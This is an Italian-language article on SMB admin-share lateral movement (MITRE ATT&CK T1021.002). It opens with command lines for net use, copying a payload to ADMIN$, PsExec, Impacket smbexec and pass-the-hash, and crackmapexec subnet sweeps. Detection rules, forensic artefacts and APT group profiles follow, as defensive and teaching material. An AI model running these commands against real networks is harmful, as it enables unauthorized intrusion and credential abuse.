Condivisioni Amministrative SMB: Remote File Share (T1021.002)

Il test di questa tecnica inizia con la mappatura delle condivisioni amministrative disponibili. Su Windows, il comando base per connettersi a una share remota utilizza la sintassi:

net use \\target-ip\C$ /user:domain\username password

Una volta stabilita la connessione, puoi copiare file eseguibili sulla macchina target e schedulare l'esecuzione remota. La sequenza classica prevede prima la copia del payload:

copy malware.exe \\target-ip\ADMIN$\temp\update.exe

Per l'esecuzione remota, PsExec di Sysinternals rimane lo strumento di riferimento. La sintassi per eseguire comandi con output locale:

psexec \\target-ip -u domain\admin -p password cmd.exe

Gli attaccanti più sofisticati preferiscono Impacket, una suite Python che include smbexec.py per operazioni stealth. L'approccio evita di lasciare servizi permanenti sul sistema target:

python smbexec.py domain/user:password@target-ip

Su Linux, il tool smbclient permette di esplorare le share disponibili. Per elencare tutte le condivisioni su un host:

smbclient -L //target-ip -U domain\\username%password

La tecnica diventa ancora più potente quando combinata con hash NTLM rubati. Tools come Mimikatz permettono di estrarre gli hash e riutilizzarli senza conoscere la password in chiaro. Il comando per Pass-the-Hash con Impacket:

python psexec.py -hashes :ntlmhash domain/admin@target-ip

Per simulare comportamenti APT avanzati, concatena multiple tecniche. Prima enumera gli host nella subnet con crackmapexec, poi propaga lateralmente:

crackmapexec smb 192.168.1.0/24 -u admin -p password --shares

La detection efficace richiede correlazione multi-evento tra accessi SMB e successive esecuzioni remote. Il pattern base da monitorare include EventID 5140 (accesso a network share) seguito da EventID 4688 (creazione processo) entro 5-10 minuti sulla macchina target.

Focus particolare sugli accessi alle share amministrative C$, ADMIN$ e IPC$. Una regola Sigma efficace correla questi eventi verificando che l'utente sorgente corrisponda al processo creato remotamente. I falsi positivi derivano principalmente da software di gestione IT legittime come SCCM o script di manutenzione schedulati.

Sysmon offre visibilità granulare con Event ID 3 (connessione di rete) che cattura connessioni SMB sulla porta 445. Combinalo con Event ID 11 (creazione file) per identificare binari copiati tramite share. La sequenza sospetta mostra: connessione SMB → scrittura file in %TEMP% → esecuzione processo figlio.

Per ridurre il rumore, implementa whitelist basate su: utenti amministrativi autorizzati, range IP dei jump server, hash dei tool di gestione approvati. Mantieni una baseline degli accessi SMB normali per reparto - il marketing non dovrebbe mai accedere a C$ sui domain controller.

L'approccio behavior-based traccia anomalie come: primo accesso di un utente a una specifica share admin, accessi fuori orario lavorativo, propagazione rapida tra multipli host. Zeek (ex Bro) eccelle nel tracciare sessioni SMB anomale con script personalizzati che monitorano file transfer sospetti.

Configura alert escalation basati su: numero di host acceduti in sequenza (>3 in 30 minuti = critical), tipo di file trasferiti (.exe, .dll, .ps1), direzione del movimento (workstation→server = high priority).

La ricostruzione forense inizia dal Security Event Log di Windows. Gli EventID 4624 (logon riuscito) di tipo 3 (network logon) indicano autenticazioni SMB remote. Correla con EventID 5140 per identificare quali share sono state accedute e da quale IP sorgente.

Il registro Microsoft-Windows-SMBClient/Security contiene dettagli granulari sulle connessioni SMB, inclusi tentativi falliti e negoziazioni di protocollo. Artefatti chiave includono timestamp di connessione, username utilizzati e versioni SMB negoziate (SMBv1 = red flag).

Su filesystem NTFS, esamina il $MFT per file creati nelle directory amministrative come C:\Windows\Temp durante la finestra temporale sospetta. L'attributo $STANDARD_INFORMATION mostra quando il file è stato creato, mentre $FILE_NAME può rivelare nomi originali se rinominati.

La memoria volatile preserva tracce di connessioni SMB attive. Tools come Volatility con plugin netscan mostrano socket aperti sulla porta 445. Il plugin filescan identifica handle aperti a file remoti, rivelando quali risorse sono state accedute via SMB.

ShimCache e Amcache registrano esecuzioni di binari, cruciali per tracciare tool trasferiti via SMB ed eseguiti localmente. Confronta timestamp di creazione file (da $MFT) con prima esecuzione (da ShimCache) per confermare la sequenza di lateral movement.

Prefetch files in C:\Windows\Prefetch documentano esecuzioni con dettagli su file acceduti e tempi di run. Binari eseguiti da path UNC (\\server\share) lasciano tracce distintive nei prefetch, confermando esecuzione remota diretta.

Per campagne APT documentate come Operation Wocao, gli analisti hanno ricostruito l'intera catena: compromissione iniziale → movimento verso domain controller via C$ → deployment di webshell → persistenza via scheduled task. La correlazione temporale tra eventi di rete e filesystem ha permesso di mappare l'infrastruttura dell'attaccante.

APT28 (Russia, GRU) utilizza SMB lateral movement come componente core delle operazioni, spesso preceduto da spear phishing mirato. Il gruppo mappa sistematicamente drive di rete con net use prima di deployare backdoor custom. Pattern ricorrente: compromissione VPN → SMB su dual-homed system → pivot su rete interna.

Lazarus Group (Corea del Nord) integra SMB movement nel malware SierraAlfa, automatizzando la propagazione su share ADMIN$. Caratteristica distintiva: utilizzo di credenziali hardcoded per domini specifici del target. Post-lateral movement, deployano cryptocurrency miner o ransomware a seconda dell'obiettivo.

Sandworm Team (Russia, Unit 74455) combina SMB con supply chain attacks, come visto in NotPetya. Copiano payload su share ADMIN$ e utilizzano scheduled task per execution. Indicatore chiave: presenza di versioni modificate di psexec con timestamp falsificati.

FIN8 (financially motivated) enumera sistematicamente share C$ per validare scope delle credenziali compromesse. Utilizzano Impacket smbexec per mantenere footprint minimo. Post-movement, focus su sistemi POS e database carte di credito.

La convergenza di tool mostra trend interessanti: Cobalt Strike presente in 12 dei 26 gruppi tracked, Impacket in crescita tra APT cinesi post-2022. L'overlap suggerisce condivisione di TTP o utilizzo di stesso fornitore di tool. Gruppi iraniani come APT39 mostrano predilezione per tool open-source modificati.

Geograficamente, APT est-europei privilegiano movimento rapido e "rumoroso" via SMB per ransomware destruction. APT cinesi preferiscono movimento lento e mirato, spesso limitato a share specifiche contenenti proprietà intellettuale.

Le informazioni presentate derivano dal framework MITRE ATT&CK, tecnica T1021.002. Riferimenti specifici includono campagne Operation Wocao, SolarWinds Compromise, e HomeLand Justice per esempi di implementazione reale.